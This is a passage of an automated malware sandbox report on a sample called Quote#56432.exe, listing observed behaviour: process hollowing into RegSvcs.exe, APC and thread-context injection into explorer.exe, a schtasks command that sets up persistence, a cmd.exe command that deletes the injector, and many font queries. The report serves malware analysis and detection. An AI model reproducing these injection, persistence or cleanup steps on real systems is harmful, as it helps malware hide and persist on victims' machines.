          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Quote#56432.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\Quote#56432.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\Quote#56432.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 119C008
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\Quote#56432.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Quote#56432.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3424
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ySWmXEgh' /XML 'C:\Users\user\AppData\Local\Temp\tmp994F.tmp'
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: explorer.exe, 00000008.00000000.692962525.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000008.00000000.727726063.0000000001080000.00000002.00020000.sdmp, systray.exe, 0000000F.00000002.926284343.0000000002E10000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.727726063.0000000001080000.00000002.00020000.sdmp, systray.exe, 0000000F.00000002.926284343.0000000002E10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.727726063.0000000001080000.00000002.00020000.sdmp, systray.exe, 0000000F.00000002.926284343.0000000002E10000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.727726063.0000000001080000.00000002.00020000.sdmp, systray.exe, 0000000F.00000002.926284343.0000000002E10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.717907917.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Users\user\Desktop\Quote#56432.exe VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
